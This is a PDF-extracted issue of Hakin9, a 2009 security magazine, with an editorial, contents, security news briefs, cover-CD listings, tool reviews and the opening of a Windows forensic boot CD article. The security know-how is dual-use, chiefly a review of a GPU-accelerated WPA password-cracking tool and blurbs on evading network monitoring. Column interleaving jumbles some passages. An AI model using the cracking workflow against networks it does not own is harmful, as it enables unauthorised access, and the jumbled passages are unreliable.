Location via proxy:   [ UP ]  
[Report a bug]   [Manage cookies]                

SH 25 Ein 6 Difgr 9

Download as pdf or txt
Download as pdf or txt
You are on page 1of 84

Year-End Summary

I
know that the Year-End Summary is mostly related to our finances and is an easy
and convenient way to sort expenses and prepare for tax time. However, I think that
we do such summarising not only when we have to take into account ourselves, but
also when we think about our life and work. I have all 6 issues that have been published
in 2009 on my desk, when looking at the covers I see how many new topics we have
presented in Hakin9 and how fast it has changed.
I hope that you agree that it was a really fruitful year for all of us. We also need to
remember that it was also a really hard year for all of us, but we must think positively
that the next one will be better than the last. This year has brought us many new attacks
and many new defense techniques. We are all waiting for the next one to be able to
write about them, to find more and more information on how to prevent against these
attacks and to make our life really interesting and enjoyable.
As most surveys reported, we also wrote about Web 2.0 and virtualisation this year
and we provided you with various articles on the hot topic of data protection. Data theft
was and is probably the main motive for most of the exploits.
We have also noticed that the attacks are becoming more and more sophisticated.
The world was attacked by the Confiker worm this year, a simple virus that infected 9
million machines. Just connecting a USB stick with devices, like a printer to print some
PDF documents, was enough for Confiker to infect and spread.
We also wrote about PDF (in)security in the 2009 issues. And we continue this motif
in the Hakin9 6/2009 issue. Let’s see what you have in your hands now and what you
can read in this end-of-the-year issue.
Our lead article is Windows FE A Windows-PE Based Forensic Boot CD written
by Marc Remmert. Also you can find an instructional tutorial (without sound) on the
CD. I hope that it will make for good additional content and will help you follow the
instructions included within the article. To further peak your interest in digital forensics;
go to page 24 and start reading Mervyn Heng’s article Network Forensics: More Than
Looking For Cleartext Passwords.
In the Attack section of the magazine you will find some excellent articles
concerning ways and means to breach security. You will learn how to stay hidden in
networks if you read Steffen Wendzel’s article on Protocol Channels. You can also find
out how fuzzing works by reading the article on page 42 written by Tamin Hanna.
Definitively, you should open the magazine on page 46 and read the second part of
Windows Timeline Analysis article written by Harlan Carvey. This time Harlan applies
all the theory to practice and tells you how to build your own timeline. Turn to page
50 to learn all about how to analyze PDF documents with the PDFiD and PDF-Parser
tools. This is the second part of Didier Stevens’ article on Anatomy of Malicious PDF
Documents.
Finally the last two articles in the Defence section definitely need to be read. If
you want to see how symbol recovery can be applied to other areas, read Recovering
Debugging Symbols From Stripped Static Compiled Binaries written by Justin Sunwoo
Kim and if you want to know how to check on possible data leakage, you should read the
article entitled Simple DLP Verification Using Network Grep contributed by Joshua Morin.
I hope that you find some free evenings as you have 9 articles in this issue to read.
Please do not forget about the Regulars. The fantastic article on how the mobile phone
opens the door to location (LBS) tracking, proximity marketing and cybercrime written
by Julian Evans and Matt Jonkman’s great column – Emerging Threats entitled Viva la
Revolucion.
We are always looking for new article topics and ideas that make Hakin9 unique and
continue taking on challenges in the creation of our magazine to provide you next year with
even greater joy and knowledge. Please remember we are waiting for your emails. Send
them to en@hakin9.org. All ideas and thoughts help us prepare a better and stimulating
magazine for you. Our aim is to create the magazine that will be read by all security
experts in the world – It is for all of you that we strive so hard to keep everyone in touch
with the latest techniques, thoughts and concerns throughout the IT Security industry...

We wish you joyful and happy holidays.


Hakin9 Team
CONTENTS
Editor in Chief: Ewa Dudzic
team BASICS
14 Windows FE
ewa.dudzic@hakin9.org

Editorial Advisory Board: Matt Jonkman, Rebecca


Wynn, Rishi Narang, Shyaam Sundhar, Terron Williams, A Windows-PE Based Forensic Boot CD
Steve Lape, Peter Giannoulis, Aditya K Sood, Donald
Iverson, Flemming Laugaard, Nick Baronian, Tyler Hudak,
MARC REMMERT
Michael Munt The basic work was conducted by Troy Larson, a Senior Forensic
DTP: Ireneusz Pogroszewski, Przemysław Banasiewicz, Investigator in Microsoft's IT Security Group. He first built a modified
Art Director: Agnieszka Marchocka
agnieszka.marchocka@hakin9.org
Windows PE for forensic purposes called Windows FE, which stands
for Forensic Environment. Astonishingly Windows is broadly used as an
Cover’s graphic: Łukasz Pabian
operating system for almost all of the recognized big forensic software
CD: Rafał Kwaśny
rafal.kwasny@gmail.com
packages – but it has never been used before as the base system for a
forensic Boot-CD. Marc Remmert will try to show how to build your own
Proofreaders: Konstantinos Xynos, Ed Werzyn, Neil
Smith, Steve Lape, Michael Munt, Monroe Dowling, Kevin Windows-based Boot CD.
Mcdonald, John Hunter, Michael Paydo, Kosta Cipo, Lou
Rabom, James Broad
Top Betatesters: Joshua Morin, Michele Orru, Clint
Garrison, Shon Robinson, Brandon Dixon, Justin Seitz,
24 Network Forensics: More Than Looking For
Matthew Sabin, Stephen Argent, Aidan Carty, Rodrigo Rubira
Branco, Jason Carpenter, Martin Jenco, Sanjay Bhalerao, Avi
Cleartext Passwords
Benchimol, Rishi Narang, Jim Halfpenny, Graham Hili, Daniel MERVYN HENG
Bright, Conor Quigley, Francisco Jesús Gómez Rodríguez,
Julián Estévez, Chris Gates, Chris Griffin, Alejandro Baena,
Digital forensics can be defined as the acquisition and analysis of evidence
Michael Sconzo, Laszlo Acs, Benjamin Aboagye, Bob from electronic data to discover incidents of malicious or suspicious intent
Folden, Cloud Strife, Marc-Andre Meloche, Robert White,
Sanjay Bhalerao, Sasha Hess, Kurt Skowronek, Bob Monroe, and correlate them with hackers or non-compliant employees. Sources
Michael Holtman, Pete LeMay
of electronic data would include computer systems, storage mediums,
Special Thanks to the Beta testers and Proofreaders who electronic files and packets traversing over a network. Digital forensics is
helped us with this issue. Without their assistance there
would not be a Hakin9 magazine. mainly conducted at two layers: network and system. Mervyn Heng will
Senior Consultant/Publisher: Paweł Marciniak
introduce you to network forensics.
CEO: Ewa Łozowicka

ATTACK
ewa.lozowicka@software.com.pl
Production Director: Andrzej Kuca
andrzej.kuca@hakin9.org
Marketing Director: Ewa Dudzic
ewa.dudzic@hakin9.org
Circulation Manager: Ilona Lepieszka

28 Unified Communications Intrusion Detection


ilona.lepieszka@hakin9.org

Subscription:
Email: subscription_support@hakin9.org Using Snort
Publisher: Software Press Sp. z o.o. SK
MARK RUBINO
02-682 Warszawa, ul. Bokserska 1 Unified Communications (UC) is one of the hottest topics in the
Phone: 1 917 338 3631
www.hakin9.org/en communications industry. UC converges several communications
Print: ArtDruk www.artdruk.com
technologies – voice, video, messaging (instant and email) and collaboration
(conferencing, white board) into one seamless IP based communication
Distributed in the USA by: Source Interlink Fulfillment
Division, 27500 Riverview Centre Boulevard, Suite 400, architecture. The UC service seamlessly detects the location, application,
Bonita Springs, FL 34134, Tel: 239-949-4450.
Distributed in Australia by: Gordon and Gotch, Australia
network and device through which to make contact. Much of the promise
Pty Ltd., Level 2, 9 Roadborough Road, Locked Bag 527, of UC is based on features found in and delivered by the Session
NSW 2086 Sydney, Australia, Phone: + 61 2 9972 8800,
Initiation Protocol (SIP) IETF RFC 3261. Mark Rubino's article is intended to
Whilst every effort has been made to ensure the high quality simplify configuration of Snort for operation on Windows platforms and to
of the magazine, the editors make no warranty, express or
implied, concerning the results of content usage. provide a measure of warning of malicious SIP activity aimed at unified
All trade marks presented in the magazine were used only
for informative purposes.
communications servers and services in their infrastructure.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams 38 Protocol Channels
we used program by STEFFEN WENDZEL
Cover-mount CD’s were tested with AntiVirenKit A protocol channel switches one of at least two protocols to send a bit
by G DATA Software Sp. z o.o
The editors use automatic DTP system combination to a destination. The main goal of a protocol channel is that
Mathematical formulas created by Design Science the packets sent look equal to all other usual packets of the system. This is
MathType™
what makes a protocol channel hard to detect. Protocol channels provide
ATTENTION!
Selling current or past issues of this magazine for attackers with a new way to stay hidden in networks. Even if detection by
prices that are different than printed on the cover is
– without permission of the publisher – harmful activity network security monitoring systems is possible – e.g. because of the unusual
and will result in judicial liability.
protocols used by the attacker – a regeneration of the hidden data near
DISCLAIMER!
The techniques described in our articles may only be impossible, since it would need information about the transferred data type,
used in private, local networks. The editors hold no
responsibility for misuse of the presented techniques the way the sent protocol combinations are interpreted (big-endian or little-
or consequent data loss.
endian) and recording of all sent packets to make a regeneration possible.

4 HAKIN9 6/2009
CONTENTS
42 Fuzzing
Finding Vulnerabilities With rand()
TAMIN HANNA
Traditionally, the search for security-related flaws in code took place as
REGULARS
follows: relevant sections of code were printed out, and developers went 06 In brief
over them trying to find as many potential issues as possible. So-called Selection of short articles from the IT
code reviews tend to work quite well – but happen rarely due to the security world.
immense cost involved. Tamin will present you with what fuzing is and how Armando Romeo &
it works. www.hackerscenter.com
ID Theft Protect

DEFENSE 08 ON THE CD
What's new on the latest Hakin9 CD.
46 Windows Timeline Analysis, Building a hakin9 team
Timeline, Part 2
HARLAN CARVEY 12 Tools
The increase in sophistication of the Microsoft (MS) Windows family of DefenceWall HIPS
operating systems (Windows 2000, XP, 2003, Vista, 2008, and Windows Don Iverson
7) as well as that of cybercrime has long required a corresponding Wireless Security Auditor
increase or upgrade in response and analysis techniques. Harlan Carvey Michael Munt
will describe what sources of timeline data are available on a Windows
XP system and how to construct a timeline of system and user activity for 70 ID fraud expert says...
analysis from an acquired image. A Look at How the Mobile Phone Opens
the Door to Location (LBS) Tracking,
50 Anatomy of Malicious PDF Documents, Part 2 Proximity Marketing and Cybercrime
DIDIER STEVENS Julian Evans
Malware analysis must be done in a safe environment – a virus lab. The
virus lab must help you prevent the malware from executing and contain
76 Interview
the malware in the virus lab, should it ever execute. The questions is, what
Interview with Michael Helander
tools you need to analyze a malicious PDF document? You could use
Ewa Dudzic
Acrobat Reader, but then you run the risk of infecting your machine when
opening the PDF document. Didier Stevens, in this second article on
malicious PDF documents, will introduce some tools to help you with your 78 Emerging Threats
analysis. Viva la Revolucion!
Matthew Jonkman

56 Recovering Debugging Symbols From


Stripped Static Compiled Binaries 79 Book Review
JUSTIN SUNWOO KIM The Myths of Security: What the
A lot of malware programs have been stripped to prevent from analyzing Computer Security Industry Doesn't Want
them and the method described will enhance the process of debugging You to Know
those malware programs and many other stripped binaries. Justin Sunwoo Michael Munt
Kim will show you a method that merely reflect other signature finding Blown to Bits
methods such as FLIRT. Also his article will be based on finding libc Lou Raban
functions in the ELF binary format. As he claims, he first started to look into
symbol recovery to better solve various war-games with stripped binaries. 82 Upcoming
However, this can be applied to various areas. Topics that will be brought up in the
upcoming issue of Hakin9
66 Simple DLP Verification Using Network Grep Ewa Dudzic
JOSHUA MORIN
Today, companies have to worry about espionage and battling the internal
Code Listings
threat of confidential information being stolen or leaked. The demand to
As it might be hard for you to use the code
implement and deploy network equipment and software for DLP increases
listings printed in the magazine, we decided
every year. How do you know if your network is safe? How do you know if
to make your work with Hakin9 much easier.
your configurations are set properly to prevent data loss? Joshua Morin
We place the complex code listings from
will actually show simple techniques for obtaining information or checking
the articles on the Hakin9 website (http:
possible data leakage.
//www.hakin9.org/en).

6/2009 HAKIN9 5
IN BRIEF
incognito flaw. The solution is that you million unique pieces of malware last
FAKE ONLINE POSTCARDS CARRY should disable the Windows Media Player year (2008). 2009 has so far seen almost
VIRUS LINKS (and also block this player via your firewall) 140,000 unique types of malware, which
One of the world’s most prevalent and then turn incognito on. Another is so far about three times what was
computer viruses called Zeus Bot is now suggestion would be open IE at the end of observed for the same period in 2008.
using fake Internet postcards to steal every session and delete the history. Malware is becoming increasingly
individuals’ sensitive personal information. sophisticated and often uses advanced
Zeus Bot has been named America's techniques to bypass standard signatures
most pervasive computer Botnet virus IPHONE LIBRARY IS SPYING ON employed by security software.
by Network World magazine, reportedly USERS McAfee also revealed that around 40
infecting 3.6 million U.S. computers. A developer has unearthed that one third- percent of all password stealing Trojans
The fake postcards are using social party library called Pinch Media is in fact can be found on website connected
engineering as a method of getting the using applications to track user application to gaming and virtual worlds, while 80
user to click and download the fake data. Not only is your location data being percent of all banking email received by
postcard. In fact what happens is the Zeus collected, but your physical movements, web users are phishing scams.
Bot malware is downloaded and installed when you open and close applications.
onto the recipients’ computer and then The reason why this isn’t a good move for
attempts to collect passwords and bank iPhone users is that Pinch Media is used MICROSOFT UNCOVER HTTPS
account numbers for bank, email and by a vast number of developers, many of BROWSER FLAW
other sensitive online accounts. which develop free applications. Microsoft researchers have uncovered
The virus is so clever that it uses a There isn’t any way in which you can a way to break the end-to-end security
(hidden) graphical interface to keep track of turn off the tracking, nor is there any EULA guarantees of HTTPS without cracking
infected computers throughout the world. license description which details what any cryptographic scheme.
The software is also equipped with tools that the application is actually doing. So in The research (opens in a PDF
allow the criminals to prioritize the banks and most instances, if you continue using any attachment) indicated that Microsoft
related stolen accounts they want to strike. application from this library you will indeed Research team discovered a whole set
be handing over some quite sensitive of vulnerabilities which could be exploited
data. Worried? You might not be, but do by a malicious proxy targeting browsers’
GOOGLE CHROME INCOGNITO you really want someone knowing your rendering modules above the HTTP/HTTPS
MODE FLAW every movement? A high proportion of layer. The research team found the following:
Towards the back end of last year (2008) applications will also cache (like cookies [In] many realistic network
Google announced that it would be on your computer) when you are offline, environments where attackers can
incorporating a private browsing function so when you next use the application your sniff the browser traffic, they can steal
in the newly launched Google Chrome. user data will be sent to the developers. sensitive data from an HTTPS server,
The private browsing function is called Pinch Media is regarded by some as fake an HTTPS page and impersonate
incognito. Incognito is designed to keep ‘spyware’, but not everyone agrees. User an authenticated user to access an
any websites that you visit during a tracking is done by the mobile phone HTTPS server. These vulnerabilities reflect
browsing session’s private. Incognito allows operators, and has been since mobiles the neglects in the design of modern
you to visit webpages and download files first appeared. Google openly collects browsers – they affect all major browsers
without recording any of your visits in your location based data, and most of us that and a large number of websites.
browser and download histories. It will use Google, know they do this. Internet According to a SecurityFocus advisory,
also delete your cookie history when you security products also collect user data, attacker-supplied HTML and script code
choose to close the incognito window. but again this is not common knowledge. would run in the context of the affected
However, it has come to light that The real issue here is not so much that browser, potentially allowing the attacker
incognito retains browser session data when tracking is taking place, but that tracking is to steal cookie-based authentication
using Chrome or Firefox to stream media being done without the users’ permission. credentials or to control how sites are
files. Notably this appears to be happening rendered to the user. Other attacks are
with Windows Media, which is a popular also possible. Security gurus believe this
streaming player. The culprit is Internet UNIQUE MALWARE PIECES ARE type of attack only affected the Mozilla
Explorer (IE) which keeps a copy of any .avi ON THE RISE browser (Firefox), but the advisory clearly
or .wmv file names in the IE history, whether With malware makers aiming to create as highlights that the vulnerabilities affect
the incognito mode is turned on or not. many as 6,000 new pieces of malware a number of browsers. The affected
Some users who don’t even use per day, the growth of malicious software browsers include Microsoft’s Internet
Internet Explorer, but who used IE’s continues to accelerate. A leading internet Explorer 8, Mozilla Firefox, Google Chrome,
Windows Media Player noticed the security vendor (McAfee) identified 1.5 Apple Safari and Opera.

6 HAKIN9 6/2009
IN BRIEF

Brothers Co When the TJX breach The numbers by locale are somewhat
TWITTER TARGETED BY DOS became public news, it was dubbed as contraddicting the last trends that
ATTACK AGAIN the biggest credit card theft in history, showed China as the most affected
A distributed denial of service (DoS) attack with 41 million credit card numbers. New country: This time the US has been
took down Twitter for the second time in a Jersey prosecutors have revealed that that the most hit (and cleaned) with over 2
week back in mid-August. While the attack was just a drop in the ocean of the total millions infected machines.
only stopped services for about half an amount of data stolen by a single man.
hour, the outage is still a concern and Behind all of these breach there is only
will only heighten fears that the service one name indeed: Albert Gonzalez. The A TROJAN DEFEATING TWO-
is under-investing in its security systems. 28 years old man who had once been an FACTOR AUTHENTICATION
Twitter gave no explanation for the attack informant for the U.S. Secret Service, lived Two factor authentication has been in
in a blog posting. We’re working to recover high in Miami Beach where was caught place for years as it represents the most
from a site outage and will update as we by Police in March 2008. The rich „nerdy secure way to authenticate against a
learn more, it said. Twitter status: Update shy guy”, as one of his friends describes system. One time passwords are mostly
(12:17p): We’re back up and analyzing the him, had been hacking into Fortune 500 used by financial institutes such as banks
traffic data to determine the nature of this companies for the last decade even to make the authentication easy and to
attack. Twitter and Facebook were hit by a while providing assistance to the Police. avoid the use of easy to crack passwords.
denial-of-service (DoS) attack on the 6th It seems that the data he had stolen These consists of numbers and letters
August. The attack appeared to cripple was not used directly by him, but instead generated by a small device (also referred
Twitter. Facebook was also affected but it sold to third parties to make fraudulent to as keyrings) that are valid for 30 or 60
didn’t take offline the entire service. purchases. The techniques used to steal seconds. A New York Times blog post has
Source: ID Thefr Protect the information, including the millions of revealed the existence of a Trojan horse,
credit cards, included wardriving, for the called Clampi, specialised in stealing
TJX breach, and the installation of malware these one time passwords in a way that
FORTINET PLANS TO GO PUBLIC that would allow him and his gang can’t be farther from being elite: The trojan
An IPO in this economic period is a rarity. backdoor access to steal the data later. grabs the keystrokes for the one time
Let alone for the Security field, where the password and then just sends the typed
last IPO was in 2007 (Sourcefire, powering password to the Hacker who promptly
Snort). Fortinet, according to Wall Street MICROSOFT LIST OF TOP 10 logs in. „One victim of Clampi was Slack
Journal, plans to go public to raise a WINDOWS MALWARE Auto Parts in Gainesville, Ga., which lost
relatively modest $100m from the market The Malicious Software Removal Tool by $75,000 to the scam” according to a post
that would allow the Sunnydale California Microsoft, is an important protection tool in the Washington Post’s Security Fix blog.
company to expand in the market of UTM introduced in Windows that allows for the
(Unified Threat Management) appliances. automatic removal of a big number of
This ever growing market has brought the malware. It is not to be confused with a full JUST 1 MINUTE TO
company 211 million dollars in revenue fledged Antivirus or Anti-Spyware tool but CRACK YOUR WPA-TKIP
thanks to anti-virus, firewall, IPS bundled it certainly increases the security of those New advancements into WPA cracking,
into one device which is more cost and users who still don’t have such software have been reported by two Japanese
management effective. Speculations installed. In the most recent report, researchers at the IEICE conference in
about imminent IPO’s by other companies Microsoft has listed the type of malware Hiroshima. It has been demonstrated that
like Qualys and NetQoS are on many being removed by the tool. The top 3 cracking WPA keys based on the TKIP
financial websites and journals. According places are occupied by Taterf, Renos and algorithm, is possible in a time frame
to many this is a a change in the Alureon. This malware is a mutation of as little as one minute. While WPA2 and
approach to the expansion of security the chineese Frethog and targets online WPA-AES are immune from this attack,
companies that once just waited for the gamers by stealing their login details. this is a big improvement from the earlier
best offer to sell to bigger corporations. Renos is software that shows fake security attack developed by Beck and Tews in
warnings in order to trick the computer 2008. Such an attack was successful only
user into downloading a cleaning utility at on a small subset of devices and took
THE MAN WHO STOLE some cost. Alureon is instead a nastier approximately 15 minutes. Wi-Fi Alliance
THE WORLD trojan capable of injecting its code into certified products must have support for
The most recent and biggest security IExplore.exe and Explorer.exe and perform WPA2 since March 2006 and the release
breaches of the last two years have a series of malicious activities such as of a practical and feasible attack against
involved the theft of over 171 million credit downloading and executing arbitrary WPA-TKIP should induce people to use
card numbers from the databases of files, hijacking the browser and reporting WPA2 instead.
TJX Cos Inc, 7-Eleven Inc and Hannaford affected user’s search engine queries. Source: hackerscenter.com

6/2009 HAKIN9 7
HAKIN9.LIVE
ON THE CD

The IT Security world is changing every day. To stay informed on the latest
technologies, threats and solutions, the IT Security Specialist has a full time job
researching many different sources for all this information, leaving little time to do
what is most important: maintaining a Secure environment!

W
e provide you this time with the be shown how to scan, test, hack and • CEHv6 Scanning
best training solutions that are secure your own systems. The lab • CEHv6 Enumeration
produced by Sequrit.org under intensive environment gives you in-depth
the management of Wayne Burke as knowledge and practical experience with You can also register (http://
well as we provide you with commercial the current essential security systems. www.sequrit.org/hakin9) for free Learning
applications and other extras. Course features: Management System (LMS) access. LMS
features includes:
ETHICAL HACKING AND • Introduction
PENETRATION TESTING • LMS • Exam engine test preparation.
This training will immerse you into an • CEHv6 Pen Testing 101 • Tutorials.
interactive environment where you will • CEHv6 Footprinting • Video's.

8 HAKIN9 6/2009
HAKIN9.LIVE
• Tools blogs. infrastructure, using the most complete and bits of information, to help you
• Forums. web attack signature database available achieve your objectives.
• Chats. in the market – N-Stealth Web Attack http://www.gameshop-
• Etc. Signature Database (over 20,000 attack international.com/
signatures).
EXTRAS www.nstalker.com Windows FE – A Windows-based
You will find the following programs Forensic Boot CD
in APPS directory on the Hakin9 Hacker Evolution
CD. Additonally there are two more Play the role of Brian Spencer, a
directories: GAME and ART. In the GAME former intelligence agent, against a
directory you will find the excellent complex enemy created by an artificial
Hacker Evolution game. Within the ART intelligence. From the creators of
directory, you will find video tutorial for a successful hacker games series
our lead article that helps you follow all (Digital Hazard, BS Hacker, etc) Hacker
instruction included in the article step by Evolution is a new hacking simulation
step.

Lavasoft Digital Lock


With prying eyes able to access all
kinds of sensitive data through your
computer, you need strong solutions to

Don’ t let your private


information fall into the
wrong hands.
secure your private information. Lavasoft
Digital Lock's multi-layered encryption game, featuring unparalleled graphics
technology allows you to securely store or and features. You play the role of a
send files, knowing that your information former intelligence agent, specializing
is safe. Only the correct password can in computer security. When a chain
unlock the file. With easy-to-use functions of events sets off worldwide, leaving
and convenient file selection, Lavasoft critical service disabled, you assume
Digital Lock is a natural addition to the the role a computer hacker to find The basic work was conducted by Troy
privacy tools you use regularly to ensure out what happened and attempt Larson, a Senior Forensic Investigator
confidentiality for your home or offices to stop it. When a stock market, a in Microsoft's IT Security Group. He first
files. central bank, satellite uplink and built a modified Windows PE for forensic
www.lavasoft.com transoceanic fiber optics links all purposes. It is called Windows FE that
crash, you know this is more then a should stand for Forensic Environment .
simple event. Something big is behind Astonishingly Windows is broadly used
all this, and you have to figure out as an operating system for almost all
what is it. You hack into computers, of the recognized big forensic software
look for exploits and information, steal packages – but it has never been used
money to buy hardware upgrades in before as the base system for a forensic
an attempt to put all the pieces of a Boot-CD.
big puzzle, together. Set in a virtual Marc Remmert will show you in his
operating system environment, the video tutorial how to create a Windows-
game is packed with all the features based forensic Boot-CD and how to
N-Stalker Web Application required to bring the hacker feeling integrate additional programs. He claims
Security Scanner 2009 and experience to ever y gamer. The that you should have basic knowledge
N-Stalker Web Application Security concept behind Hacker Evolution is about the Windows operating system as
Scanner 2009 Free Edition provides to create a game that challenges the well as some basic knowledge about
a restricted set of free Web Security gamer's intelligence, attention and computer forensics.
Assessment checks to enhance the focus, creating a captivating mind
overall security of your web server game. Solve puzzles, examine code

10 HAKIN9 6/2009
IF THE CD CONTENTS CAN’T BE ACCESSED AND THE
DISC ISN’T PHYSICALLY DAMAGED, TRY TO RUN IT ON AT
LEAST TWO CD DRIVES.
IF YOU HAVE EXPERIENCED ANY PROBLEMS WITH THE CD, E-MAIL:
CD@HAKIN9.ORG
TOOLS
DefenseWall HIPS
Quick Start. Installing DefenseWall questions in an intelligent manner. DefenseWall
HIPS is a very simple and HIPS doesn’t force the user to do this. Even
straightforward process. I did not though I am an expert user these questions
experience any problems at all while installing wear me down eventually too, and as a result, I
and configuring the program. sometimes end up with an anti-malware program
Conventional anti-malware programs rely or personal firewall that is not functioning at its
heavily on regularly updating the program intended level. SoftSphere recommends the use
definitions. This is necessary in order to cope of a good conventional anti-virus program. The
with the ever-changing landscape of threats. primary reason for this is that it is very difficult
DefenseWall HIPS is a Host Intrusion for the average user to determine where on the
Prevention System program and as such it hard drive any malware that might be present
doesn’t need to be concerned about updating is located. They suggest letting the anti-virus
definitions or even about having definitions at all. program search for the malware and find it for you.
HIPS programs are frequently found actively Disadvantages. Two of DefenseWall HIPS
protecting enterprise level networks and are primary characteristics are not likely to be fully
usually very complex and generally very expensive. appreciated by the average user. First, it is
It doesn’t take a lot of research to conclude relatively inexpensive relative to the sophisticated
that definitions based anti-malware programs protective services that it offers. And second, the
are just as lacking for home and small ordinary user won’t see a lot of indication that
business users. the program is working effectively, other than just
DefenseWall HIPS manages to function by noticing that there is an absence of malware
System Used: Windows 7 both more simply and more effectively than wreaking havoc on their system.
Pro 32 Bit definitions based anti-malware programs. It even I believe that there is a challenge facing
System: Windows 2000/ performs more simply than the enterprise HIPS SoftSphere to sufficiently educate users
XP/2003/Vista 32 bit software solutions and in most ways it is just as concerning how a program that costs so little is
License: Trial Version effective and provides just as much protection. able to accomplish so much. I also think that it
(2.56)/ $29.95 and For a number of reasons there are always might help to provide some additional indicators
includes one year of threats in the wild for which no definitions that reflect more clearly the protective function
program updates and currently exist. Furthermore, as soon as that is so quietly at work.
first level support definitions do exist for the current malware, Summing up. DefenseWall HIPS is a program
Purpose: Protect System malware developers are quick to modify their that, in my opinion, users should include in
from All Types of Malware products so they are once again able to their anti-malware arsenal regardless of their
Homepage: http:// escape detection. As mentioned earlier, some experience level. It provides an excellent level
www.softsphere.com malware is even able to modify itself after it has of protection and requires a minimum amount
infected a system in order to remain hidden or of attention. An ordinary user can use it almost
to once again become hidden. effortlessly. A power user can take advantage
This is another issue that DefenseWall HIPS of the advanced configuration options in order
conveniently sidesteps. As a result, Zero Day to achieve fuller control. This positive result for
Attacks do not pose a more serious problem varying levels of users is not often achieved even
than ordinary attacks for a computer protected in programs costing many times more than
by DefenseWall HIPS. In fact, if DefenseWall DefenseWall HIPS.
HIPS is installed on a clean fresh system, Zero Finally, SoftSphere provides frequent
Day attacks don’t pose any threat at all. updates, which reflects its active development.
For me it is a welcome relief not to have to Although I experienced no reason to request
respond to a program that repeatedly questions any support services, all indications from online
you about whether a particular process should be discussion groups confirm the existence of an
trusted or not. Many personal firewalls bombard excellent response team for dealing with any
the user with question after question when they problems or questions that may arise. There is
are in learning mode and many HIPS programs even a support forum online where the primary
take the same approach. It is generally beyond developer actively participates.
the ability of the average user to respond to these by Don Iverson

12 HAKIN9 6/2009
TOOLS

Wireless Security Auditor


Elcomsoft Wireless Security Auditor products.html If you have multiple cards, you
allows network administrators to will need to disable SLI (either in driver or by
manually verify how secure their own physically disconnecting the cards). The program
company’s wireless network is by executing also works with all ATI cards that support ATI
an audit of the accessible wireless networks Stream(tm) Technology, in particular Radeon
within their domain using brute forcing of HD 4800 Series, Radeon HD 4600 Series, and
the passwords used. Wireless networks are Radeon HD 3000 Series. There is a password
sometimes overlooked in normal network file supplied with the program itself, containing
audits, or staff can sometimes attach their own 242966 entries within it which isnt too bad, but
access point to then bypass the other security there are a lot larger ones available on the
measures that the company has in place. IE Internet (just ask Google)
for unrestricted Internet access. When you run There are a variety of mutation options
the actual program, you presented with a very (Case mutation, Digit mutation, Border mutation,
clean and easy to use interface. Once you have Freak mutation, Abbreviation mutation, Order
obtained your relevant capture to attack using mutation, Vowels mutation, Strip mutation, Swap
your favorite tool to gather the required data. mutation, Duplicate mutation, Delimiter mutation,
EWSA will actually import data from the following Year mutation) available to select when using
formats: Tcpdump Log, Commview Log, the dictionary attacks on the capture file, which
Proactive System Password Recovery (an export might be the reason why the dictionary file is so
of the hash on a machine that uses Wireless slim.
Zero Configuration), Local Registry (a dump of Each mutation can be manually set for
the hashes in the registry), Manual Entry. speed or efficiency, or you can select the preset License: Commercial
EWSA can only use the PSPR and registry maximum speed and efficiency options. Finally Purpose: Determine how
dump if the WZC is in use and not via a third you can disable the mutation completely. secure your wireless
party client. The captured data will need to You are also able to add it your own network is
contain the full authentication handshake from dictionary files if you so wish, and select which Homepage: http:
a real client and the access point. EWSA does you would like to be used in cracking the file. //www.elcomsoft.com/
not work with the packets where linktype is For this review I used an WPA dump ewsa.html
LINKTYPE _ ETHERNET (these are from wired, provided by the Wireshark website, with a known
not wireless networks). There are a various password (as I am currently only able to use
options available to aid in the cracking of the the trial version which limits the amount of
files. You can select multiple cpu (if available characters shown for the recovered password).
on your machine) and there is also hardware Once you start the attack process off, EWSA
acceleration via most modern NVIDIA and ATI gives you an estimation on when the attack
video cards. You can use GeForce 8-, 9-, 200- should be completed, how many dictionaries
series with a minimum of 256MB graphics are left to be used, and the amount of current
memory or Quadro cards. processor usage that has been assigned to
Full list of supported devices can be found the task. Once a password has been found, the
here http://www.nvidia.com/object/cuda_learn_ program stops exactly there and presents you
with a nice little congratulations prompt and then
it shows you the password found. You can then
save this as a project for future use if required.
Overall I found this program very easy and
simple to use. Both sides of the IT security fence
will enjoy this product as it enables anyone
to basically brute force a WPA/WPA2-PSK
password fairly quickly. This will aid those on
the defence side in finding out how secure their
Figure 1. Provided WPA/WPA2 security is used
EWSA can find an 8-character password 7 system is, and those on attack will love the add
times faster on one GTX 295, compared to file and forget ease of use.
Core 2 Quad Q6600 by Michael Munt

6/2009 HAKIN9 13
BASICS
MARC REMMERT

Windows FE
A Windows-PE Based
Forensic Boot CD
Difficulty

Back in the mid of 2008 some rumors regarding a Microsoft


Windows FE Boot-CD started. While there were discussions in
certain web logs dealing with IT-security and computer forensics,
this Windows-CD never got a lot of attention.

T
he basic work was conducted by Troy process itself must not leave any traces on the
Larson, a Senior Forensic Investigator in evidence itself. Unfortunately, Loccards Law is
Microsoft's IT Security Group. He first built a also valid in the field of computer forensics.
modified Windows PE for forensic purposes. It is This law states that every interaction with
called Windows FE that should stand for Forensic an evidence leads to an exchange of some
Environment. substance, in other words, the analysis of
Astonishingly Windows is broadly used as an evidence might alter it.
operating system for almost all of the recognized In the medical forensics, such an alteration is
big forensic software packages – but it has never minimized for example by using sterile gloves and
been used before as the base system for a masks. Therefore traditional computer forensics
forensic Boot-CD. investigations are only conducted on bit-identical
I will try to show the reader how to build his copies of the disk. In most cases, the affected
own Windows-based Boot CD and that it really discs will be removed from its enclosures and
works. further on imaged in a laboratory with special
hardware and software.
Short Intro It should be mentioned that we can observe
to Computer Forensics a change of attitude over the last years – only
Since the invention of computers the bad guys examining a suspect’s hard disk and not the
have been committing crimes with their aid. contents of his PCs’ RAM might miss significant
Only just two decades ago law enforcement evidence. However the process of gathering the
agencies recognized the need to conduct RAM contents alters the state of the operating
examinations of computer systems. For system for the sake of getting possible additional
WHAT YOU WILL example, as recently as 1988 the German evidence. Also, RAM-analysis and interpretation
LEARN... Federal Criminal Police Office established a of the data found is still under ongoing research.
How to create a Vista-based
Computer Crime Unit. The United States were And there are significant changes in every
forensic Boot-CD and how to a bit faster. In 1984 the FBI founded a Magnetic new version of operating system. In my further
integrate additional programs
Media Program, later known as the Computer discussion I will just aim to the traditional dead-
WHAT SHOULD YOU Analysis and Response Team (CART). analysis – the examination of the contents of
KNOW... Like the long-existing medical forensics hard drives of a powered-down system. Based
Basic knowledge about the computer forensics should reveal traces of on my professional experience those systems
Windows operating system, possible crimes and eventually prepare them still make up the majority of evidence. As usual,
some basic knowledge about
computer forensics for a court presentation. The examination your mileage may vary...

